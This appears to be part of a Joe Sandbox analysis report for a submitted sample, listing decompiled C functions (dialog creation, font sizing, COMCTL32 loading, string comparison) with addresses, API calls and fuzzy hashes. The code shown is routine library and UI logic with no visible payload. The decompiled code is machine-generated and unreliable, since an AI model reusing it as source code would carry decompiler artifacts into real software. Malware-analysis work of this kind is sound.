                                                                              0x004249d9
                                                                              0x004249de
                                                                              0x004249ee
                                                                              0x004249f0
                                                                              0x004249f3
                                                                              0x004249f6
                                                                              0x00424a00
                                                                              0x00424a00
                                                                              0x00424a08
                                                                              0x00424a10
                                                                              0x00424a13
                                                                              0x00424a16
                                                                              0x00424a19
                                                                              0x00424a1c
                                                                              0x00424a26
                                                                              0x00424a2d
                                                                              0x00424a5a
                                                                              0x00424a5d
                                                                              0x00424a5d
                                                                              0x00424a5f
                                                                              0x00424a41
                                                                              0x00424a41
                                                                              0x00424bd5
                                                                              0x00424bda
                                                                              0x00424be3
                                                                              0x00424be3
                                                                              0x00424a61
                                                                              0x00424a66
                                                                              0x00424a70
                                                                              0x00424a7c
                                                                              0x00424a80
                                                                              0x00424a8d
                                                                              0x00424a92
                                                                              0x00424a98
                                                                              0x00424a9a
                                                                              0x00424ad2
                                                                              0x00424ad2
                                                                              0x00424ad4
                                                                              0x00424b15
                                                                              0x00424b15
                                                                              0x00424b19
                                                                              0x00424b1d
                                                                              0x00424b1e
                                                                              0x00424b23
                                                                              0x00424b26
                                                                              0x00424b28
                                                                              0x00424b2e
                                                                              0x00424b2a
                                                                              0x00424b2a
                                                                              0x00424b2a
                                                                              0x00424b48
                                                                              0x00424b4a
                                                                              0x00424b6e
                                                                              0x00424b71
                                                                              0x00424b75
                                                                              0x00424b77
                                                                              0x00424b7f
                                                                              0x00424b82
                                                                              0x00424b84
                                                                              0x00424b8b
                                                                              0x00424b8b
                                                                              0x00424b84
                                                                              0x00424b91
                                                                              0x00424b96
                                                                              0x00424b98
                                                                              0x00424b9e
                                                                              0x00424b9e
                                                                              0x00424ba4
                                                                              0x00424ba6
                                                                              0x00424ba8
                                                                              0x00424bac
                                                                              0x00424baf
                                                                              0x00424bb5
                                                                              0x00424bb5
                                                                              0x00424bb5
                                                                              0x00424bac
                                                                              0x00424bb7
                                                                              0x00424bba
                                                                              0x00424bbf
                                                                              0x00424bc8
                                                                              0x00424bc8
                                                                              0x00424bd0
                                                                              0x00424bd2
                                                                              0x00424bd2
                                                                              0x00424bd2
                                                                              0x00000000
                                                                              0x00424bd2
                                                                              0x00424ad6
                                                                              0x00424ada
                                                                              0x00424ae5
                                                                              0x00424ae9
                                                                              0x00424af9
                                                                              0x00424afc
                                                                              0x00424b00
                                                                              0x00424b05
                                                                              0x00424b08
                                                                              0x00424b13
                                                                              0x00424b13
                                                                              0x00000000
                                                                              0x00424b08
                                                                              0x00424a9c
                                                                              0x00424a9e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424aa2
                                                                              0x00424aa8
                                                                              0x00424aaa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424ab4
                                                                              0x00424abb
                                                                              0x00424abf
                                                                              0x00424ac2
                                                                              0x00424ac6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424ac8
                                                                              0x00424acd
                                                                              0x00424acf
                                                                              0x00424acf
                                                                              0x00000000
                                                                              0x00424acd
                                                                              0x00424a34
                                                                              0x00424a3f
                                                                              0x00424a56
                                                                              0x00000000
                                                                              0x00424a56
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004249DE
                                                                              • GetSystemMetrics.USER32 ref: 00424AA2
                                                                              • GlobalLock.KERNEL32 ref: 00424B0D
                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,Function_00024470,00000000), ref: 00424B3C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                              • String ID: MS Shell Dlg
                                                                              • API String ID: 2364537584-76309092
                                                                              • Opcode ID: ad94d330b533e1bcc8f2f09ff8cb8db99c94e592d6dbf8400f4186f422917a1d
                                                                              • Instruction ID: 330e556eb1524598ba7eb11baf331d4e34cb7b5cbbed86dc3fc3bb5d114f69ae
                                                                              • Opcode Fuzzy Hash: ad94d330b533e1bcc8f2f09ff8cb8db99c94e592d6dbf8400f4186f422917a1d
                                                                              • Instruction Fuzzy Hash: 0751D231A00225DFCF11EFA4E845AEEBBB4EF84314F54056AE412E7292D7789D81CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004158EC, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 51%
                                                                              			E004158EC(void* __ecx, intOrPtr _a4, signed int _a8) {
				intOrPtr _t19;
				signed int _t21;
				signed int _t22;
				void* _t24;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t35;
				intOrPtr* _t36;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t33 = __ecx;
				_t35 = _a4;
				E00412140(_t35, 0, 0x90);
				_t37 = _a8;
				_t19 =  *_t37;
				_t39 = _t38 + 0xc;
				if(_t19 == 0) {
					L4:
					return 0;
				}
				if(_t19 != 0x2e) {
					L5:
					_a8 = _a8 & 0x00000000;
					while(1) {
						_t21 = E00419CA0(_t33, _t37, "_.,");
						_pop(_t33);
						if(_t21 == 0) {
							break;
						}
						_t36 = _t21 + _t37;
						_t31 =  *_t36;
						if(_a8 != 0) {
							if(_a8 != 1) {
								if(_a8 != 2 || _t21 >= 0x10 || _t31 != 0 && _t31 != 0x2c) {
									break;
								} else {
									_push(_t21);
									_t24 = _a4 + 0x80;
									L19:
									_push(_t37);
									_push(_t24);
									L20:
									E0041ADB0();
									_t39 = _t39 + 0xc;
									if(_t31 == 0x2c || _t31 == 0) {
										_t22 = 0;
										L25:
										return _t22;
									} else {
										_a8 = _a8 + 1;
										_t37 = _t36 + 1;
										continue;
									}
								}
							}
							if(_t21 >= 0x40 || _t31 == 0x5f) {
								break;
							} else {
								_push(_t21);
								_t24 = _a4 + 0x40;
								goto L19;
							}
						}
						if(_t21 >= 0x40 || _t31 == 0x2e) {
							break;
						} else {
							_push(_t21);
							_push(_t37);
							_push(_a4);
							goto L20;
						}
					}
					_t22 = _t21 | 0xffffffff;
					goto L25;
				}
				_t27 = _t37 + 1;
				if( *((char*)(_t37 + 1)) == 0) {
					goto L5;
				}
				E0041ADB0(_t35 + 0x80, _t27, 0xf);
				 *((char*)(_t35 + 0x8f)) = 0;
				goto L4;
			}














                                                                              0x004158ec
                                                                              0x004158f1
                                                                              0x004158fc
                                                                              0x00415901
                                                                              0x00415904
                                                                              0x00415906
                                                                              0x0041590b
                                                                              0x00415932
                                                                              0x00000000
                                                                              0x00415932
                                                                              0x0041590f
                                                                              0x00415939
                                                                              0x00415939
                                                                              0x004159ab
                                                                              0x004159b1
                                                                              0x004159b9
                                                                              0x004159ba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415944
                                                                              0x00415947
                                                                              0x00415949
                                                                              0x00415960
                                                                              0x00415979
                                                                              0x00000000
                                                                              0x00415989
                                                                              0x00415989
                                                                              0x0041598d
                                                                              0x00415992
                                                                              0x00415992
                                                                              0x00415993
                                                                              0x00415994
                                                                              0x00415994
                                                                              0x00415999
                                                                              0x0041599f
                                                                              0x004159c4
                                                                              0x004159bf
                                                                              0x00000000
                                                                              0x004159a5
                                                                              0x004159a5
                                                                              0x004159a8
                                                                              0x00000000
                                                                              0x004159a8
                                                                              0x0041599f
                                                                              0x00415979
                                                                              0x00415965
                                                                              0x00000000
                                                                              0x0041596c
                                                                              0x0041596c
                                                                              0x00415970
                                                                              0x00000000
                                                                              0x00415970
                                                                              0x00415965
                                                                              0x0041594e
                                                                              0x00000000
                                                                              0x00415955
                                                                              0x00415955
                                                                              0x00415956
                                                                              0x00415957
                                                                              0x00000000
                                                                              0x00415957
                                                                              0x0041594e
                                                                              0x004159bc
                                                                              0x00000000
                                                                              0x004159bc
                                                                              0x00415911
                                                                              0x00415917
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415923
                                                                              0x0041592b
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strncpy$_strcspn
                                                                              • String ID: ,$,$.$_$_.,
                                                                              • API String ID: 209312476-1893563293
                                                                              • Opcode ID: f76e61240114efc4bef41cd4e5516df8a96ead8180aaed60b9a11de01cae27a7
                                                                              • Instruction ID: cd4318613fc8f866815621c17c04b6bdb5c0170a03521b7116e98623aa085235
                                                                              • Opcode Fuzzy Hash: f76e61240114efc4bef41cd4e5516df8a96ead8180aaed60b9a11de01cae27a7
                                                                              • Instruction Fuzzy Hash: 6621E5B1561946FDFF308A25C801BEB3759AB92374F188417F9498B282D33C99C5879F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00429908, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00429908(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x457184; // 0xb7aa1229
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E00412FBB(E004297D0(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                              0x0042990e
                                                                              0x00429915
                                                                              0x0042991e
                                                                              0x00429921
                                                                              0x00429924
                                                                              0x00429927
                                                                              0x0042992c
                                                                              0x00429930
                                                                              0x0042993a
                                                                              0x00429949
                                                                              0x0042994d
                                                                              0x0042995a
                                                                              0x0042995c
                                                                              0x0042995e
                                                                              0x0042995e
                                                                              0x00429979
                                                                              0x0042997b
                                                                              0x0042997b
                                                                              0x00429981
                                                                              0x00429986
                                                                              0x00429988
                                                                              0x00429988
                                                                              0x004299a3
                                                                              0x004299a3
                                                                              0x00429934
                                                                              0x00429938
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • GetStockObject.GDI32(00000011), ref: 0042992C
                                                                              • GetStockObject.GDI32(0000000D), ref: 00429934
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 00429941
                                                                              • GetDC.USER32(00000000), ref: 00429950
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00429964
                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00429970
                                                                              • ReleaseDC.USER32 ref: 0042997B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                              • String ID: System
                                                                              • API String ID: 46613423-3470857405
                                                                              • Opcode ID: 450ddf9b251880a93b6c8adec8f45b3a5c6e0e7d1307f96023e75738f48cb576
                                                                              • Instruction ID: e77bea6ff984db64622139dd441a974045562c9bc65b1df99976ca27c7404182
                                                                              • Opcode Fuzzy Hash: 450ddf9b251880a93b6c8adec8f45b3a5c6e0e7d1307f96023e75738f48cb576
                                                                              • Instruction Fuzzy Hash: 2611BF71B00218EBEB109FA0ED45BAE7B78FB44754F40402AF605A6290D7B89D42CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425947, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 40%
                                                                              			E00425947(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                              0x0042594a
                                                                              0x00425957
                                                                              0x00425959
                                                                              0x0042595f
                                                                              0x00425963
                                                                              0x004259bc
                                                                              0x00425965
                                                                              0x0042596b
                                                                              0x0042596d
                                                                              0x00425975
                                                                              0x00425992
                                                                              0x0042599a
                                                                              0x0042599e
                                                                              0x004259a2
                                                                              0x004259a4
                                                                              0x004259aa
                                                                              0x004259aa
                                                                              0x004259a2
                                                                              0x00425977
                                                                              0x00425986
                                                                              0x00425988
                                                                              0x0042598e
                                                                              0x0042598e
                                                                              0x00425986
                                                                              0x004259b1
                                                                              0x00000000
                                                                              0x004259b7

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,004262F9,?,00040000), ref: 00425950
                                                                              • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00425959
                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042596D
                                                                              • #17.COMCTL32 ref: 00425988
                                                                              • #17.COMCTL32 ref: 004259A4
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004259B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                              • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                              • API String ID: 1437655972-4218389149
                                                                              • Opcode ID: 02f9f2db7425b3481627d31e585d5f200e928fcb464cc0c10b18e8231ce32bbf
                                                                              • Instruction ID: bdb602d294863cf9800f5fb213bfd1d93958a693a90a29ccf5b0ef3496ef9c33
                                                                              • Opcode Fuzzy Hash: 02f9f2db7425b3481627d31e585d5f200e928fcb464cc0c10b18e8231ce32bbf
                                                                              • Instruction Fuzzy Hash: AAF0A472B05632C7A7119B64BD4862BB6A8BF94371B565432FD00E3220CBB8DC45867E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041F4BE, Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0041F4BE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				short* _t163;
				int _t166;
				void* _t167;
				int _t168;
				void* _t169;
				short* _t170;
				void* _t175;

				_push(0x40);
				_push(0x44dd38);
				E00412BA4(__ebx, __edi, __esi);
				_t94 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t169 - 0x1c)) = _t94;
				_t162 = 0;
				_t166 = 1;
				_t175 =  *0x45a8c4 - _t162; // 0x0
				if(_t175 == 0) {
					if(CompareStringW(0, 0, 0x44bd1c, 1, 0x44bd1c, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x45a8c4 = 2;
						}
					} else {
						 *0x45a8c4 = 1;
					}
				}
				if( *(_t169 + 0x14) > _t162) {
					 *(_t169 + 0x14) = E0041F4A2( *(_t169 + 0x10),  *(_t169 + 0x14));
				}
				_t95 =  *(_t169 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E0041F4A2( *(_t169 + 0x18), _t95);
					 *(_t169 + 0x1c) = _t95;
				}
				_t144 =  *0x45a8c4; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t169 - 0x38) = _t162;
					__eflags =  *(_t169 + 8) - _t162;
					if( *(_t169 + 8) == _t162) {
						_t109 =  *0x45a730; // 0x0
						 *(_t169 + 8) = _t109;
					}
					_t142 =  *(_t169 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x45a740; // 0x0
					}
					_t167 = E0041AED4( *(_t169 + 8));
					__eflags = _t167 - 0xffffffff;
					if(_t167 != 0xffffffff) {
						__eflags = _t167 - _t142;
						if(__eflags == 0) {
							L67:
							_t166 = CompareStringA( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 + 0x10),  *(_t169 + 0x14),  *(_t169 + 0x18),  *(_t169 + 0x1c));
							__eflags = _t162;
							if(_t162 != 0) {
								_push(_t162);
								E00412A4D();
								_push( *(_t169 - 0x38));
								E00412A4D();
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x14);
						_push( *(_t169 + 0x10));
						_push(_t167);
						_push(_t142);
						_t162 = E0041AF17(_t142, _t162, _t167, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x1c);
						_push( *(_t169 + 0x18));
						_push(_t167);
						_push(_t142);
						_t106 = E0041AF17(_t142, _t162, _t167, __eflags);
						 *(_t169 - 0x38) = _t106;
						__eflags = _t106;
						if(_t106 != 0) {
							 *(_t169 + 0x10) = _t162;
							 *(_t169 + 0x18) =  *(_t169 - 0x38);
							goto L67;
						}
						_push(_t162);
						E00412A4D();
					}
					goto L61;
				} else {
					if(_t144 != _t166) {
						L61:
						_t98 = 0;
						L70:
						return E00412BDF(E00412FBB(_t98,  *((intOrPtr*)(_t169 - 0x1c))));
					}
					 *(_t169 - 0x3c) = _t162;
					 *(_t169 - 0x44) = _t162;
					 *(_t169 - 0x40) = _t162;
					if( *(_t169 + 0x20) == _t162) {
						_t144 =  *0x45a740; // 0x0
						 *(_t169 + 0x20) = _t144;
					}
					if( *(_t169 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t169 + 0x14) != _t95) {
							__eflags = _t95 - _t166;
							if(_t95 > _t166) {
								L69:
								_t98 = _t166;
								goto L70;
							}
							__eflags =  *(_t169 + 0x14) - _t166;
							if( *(_t169 + 0x14) <= _t166) {
								_t111 = GetCPInfo( *(_t169 + 0x20), _t169 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t169 + 0x14) - _t162;
								if( *(_t169 + 0x14) <= _t162) {
									__eflags =  *(_t169 + 0x1c) - _t162;
									if( *(_t169 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t169 - 0x30) - _t141;
									if( *(_t169 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t169 - 0x2a;
									__eflags =  *((char*)(_t169 - 0x2a));
									if( *((char*)(_t169 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t169 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t169 - 0x30) - _t141;
								if( *(_t169 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t169 - 0x2a;
								__eflags =  *((char*)(_t169 - 0x2a));
								if( *((char*)(_t169 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t169 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x10),  *(_t169 + 0x14), _t162, _t162);
						 *(_t169 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t169 - 4) = _t162;
						E00412260(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t169 - 0x18) = _t170;
						 *(_t169 - 0x34) = _t170;
						 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
						_t118 =  *(_t169 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t169 + 0x20), _t166,  *(_t169 + 0x10),  *(_t169 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t169 - 0x3c);
								if( *(_t169 - 0x3c) != 0) {
									_push( *(_t169 - 0x34));
									E00412A4D();
								}
								_t98 =  *(_t169 - 0x40);
								goto L70;
							}
							_t168 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x18),  *(_t169 + 0x1c), 0, 0);
							 *(_t169 - 0x4c) = _t168;
							__eflags = _t168;
							if(_t168 == 0) {
								goto L53;
							}
							 *(_t169 - 4) = 1;
							E00412260(_t168 + _t168 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t169 - 0x18) = _t170;
							_t163 = _t170;
							 *(_t169 - 0x50) = _t163;
							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
							__eflags = _t163;
							if(_t163 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t169 + 0x20), 1,  *(_t169 + 0x18),  *(_t169 + 0x1c), _t163, _t168);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t169 - 0x40) = CompareStringW( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 - 0x34), _t143, _t163, _t168);
								}
								__eflags =  *(_t169 - 0x44);
								if( *(_t169 - 0x44) != 0) {
									_push(_t163);
									E00412A4D();
								}
								goto L53;
							} else {
								_t163 = E00412247(_t168 + _t168);
								__eflags = _t163;
								if(_t163 == 0) {
									goto L53;
								}
								 *(_t169 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E00412247(_t143 + _t143);
							_pop(_t144);
							 *(_t169 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t169 - 0x3c) = _t166;
							goto L43;
						}
					}
				}
			}































                                                                              0x0041f4be
                                                                              0x0041f4c0
                                                                              0x0041f4c5
                                                                              0x0041f4ca
                                                                              0x0041f4cf
                                                                              0x0041f4d2
                                                                              0x0041f4d6
                                                                              0x0041f4d7
                                                                              0x0041f4dd
                                                                              0x0041f4f2
                                                                              0x0041f4fc
                                                                              0x0041f502
                                                                              0x0041f505
                                                                              0x0041f507
                                                                              0x0041f507
                                                                              0x0041f4f4
                                                                              0x0041f4f4
                                                                              0x0041f4f4
                                                                              0x0041f4f2
                                                                              0x0041f514
                                                                              0x0041f522
                                                                              0x0041f522
                                                                              0x0041f525
                                                                              0x0041f52a
                                                                              0x0041f530
                                                                              0x0041f536
                                                                              0x0041f536
                                                                              0x0041f539
                                                                              0x0041f541
                                                                              0x0041f544
                                                                              0x0041f783
                                                                              0x0041f786
                                                                              0x0041f789
                                                                              0x0041f78b
                                                                              0x0041f790
                                                                              0x0041f790
                                                                              0x0041f793
                                                                              0x0041f796
                                                                              0x0041f798
                                                                              0x0041f79a
                                                                              0x0041f79a
                                                                              0x0041f7a9
                                                                              0x0041f7ab
                                                                              0x0041f7ae
                                                                              0x0041f7b4
                                                                              0x0041f7b6
                                                                              0x0041f801
                                                                              0x0041f819
                                                                              0x0041f81b
                                                                              0x0041f81d
                                                                              0x0041f81f
                                                                              0x0041f820
                                                                              0x0041f825
                                                                              0x0041f828
                                                                              0x0041f82e
                                                                              0x00000000
                                                                              0x0041f81d
                                                                              0x0041f7b8
                                                                              0x0041f7ba
                                                                              0x0041f7bf
                                                                              0x0041f7c0
                                                                              0x0041f7c3
                                                                              0x0041f7c4
                                                                              0x0041f7cd
                                                                              0x0041f7cf
                                                                              0x0041f7d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f7d3
                                                                              0x0041f7d5
                                                                              0x0041f7da
                                                                              0x0041f7db
                                                                              0x0041f7de
                                                                              0x0041f7df
                                                                              0x0041f7e0
                                                                              0x0041f7e8
                                                                              0x0041f7eb
                                                                              0x0041f7ed
                                                                              0x0041f7f8
                                                                              0x0041f7fe
                                                                              0x00000000
                                                                              0x0041f7fe
                                                                              0x0041f7ef
                                                                              0x0041f7f0
                                                                              0x0041f7f5
                                                                              0x00000000
                                                                              0x0041f552
                                                                              0x0041f554
                                                                              0x0041f7b0
                                                                              0x0041f7b0
                                                                              0x0041f831
                                                                              0x0041f841
                                                                              0x0041f841
                                                                              0x0041f55a
                                                                              0x0041f55d
                                                                              0x0041f560
                                                                              0x0041f566
                                                                              0x0041f568
                                                                              0x0041f56e
                                                                              0x0041f56e
                                                                              0x0041f574
                                                                              0x0041f581
                                                                              0x0041f58a
                                                                              0x0041f58c
                                                                              0x0041f82f
                                                                              0x0041f82f
                                                                              0x00000000
                                                                              0x0041f82f
                                                                              0x0041f592
                                                                              0x0041f595
                                                                              0x0041f5a6
                                                                              0x0041f5ac
                                                                              0x0041f5ae
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5b4
                                                                              0x0041f5b7
                                                                              0x0041f5e4
                                                                              0x0041f5e7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5e9
                                                                              0x0041f5ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5f2
                                                                              0x0041f5f5
                                                                              0x0041f5f9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5ff
                                                                              0x0041f5ff
                                                                              0x0041f5ff
                                                                              0x0041f602
                                                                              0x0041f604
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f60d
                                                                              0x0041f60f
                                                                              0x0041f611
                                                                              0x0041f61b
                                                                              0x0041f61b
                                                                              0x0041f61d
                                                                              0x0041f620
                                                                              0x00000000
                                                                              0x00000000
